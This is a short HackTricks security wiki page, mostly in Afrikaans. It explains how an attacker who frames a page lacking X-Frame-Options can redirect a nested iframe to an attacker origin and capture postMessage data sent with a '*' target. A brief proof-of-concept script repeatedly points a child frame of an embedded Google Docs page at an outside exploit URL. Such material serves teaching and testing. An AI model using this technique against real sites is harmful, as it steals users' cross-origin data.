Afrikaans - Ht
HackTricks Training Twitter Linkedin Sponsor

Steal postmessage modifying iframe location

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Changing child iframes locations

Volgens hierdie skrywe, as jy 'n webblad kan iframe sonder 'n X-Frame-Header wat 'n ander iframe bevat, kan jy die ligging van daardie kind iframe verander.

Byvoorbeeld, as abc.com efg.com as iframe het en abc.com nie 'n X-Frame-header het nie, kan ek die efg.com na evil.com kruis oorsprong verander met frames.location.

Dit is veral nuttig in postMessages omdat as 'n bladsy sensitiewe data stuur met 'n wildcard soos windowRef.postmessage("","*"), dit moontlik is om die ligging van die verwante iframe (kind of ouer) na 'n aanvaller se beheerde ligging te verander en daardie data te steel.

<html>
<iframe src="https://docs.google.com/document/ID" />
<script>
//pseudo code
setTimeout(function(){ exp(); }, 6000);

function exp(){
//needs to modify this every 0.1s as it's not clear when the iframe of the iframe affected is created
setInterval(function(){
window.frames[0].frame[0][2].location="https://geekycat.in/exploit.html";
}, 100);
}
</script>
</html>

Leer & oefen AWS Hacking:HackTricks Opleiding AWS Red Team Expert (ARTE) Leer & oefen GCP Hacking: HackTricks Opleiding GCP Red Team Expert (GRTE)

Ondersteun HackTricks
PreviousBypassing SOP with Iframes - 2NextProxy / WAF Protections Bypass

Last updated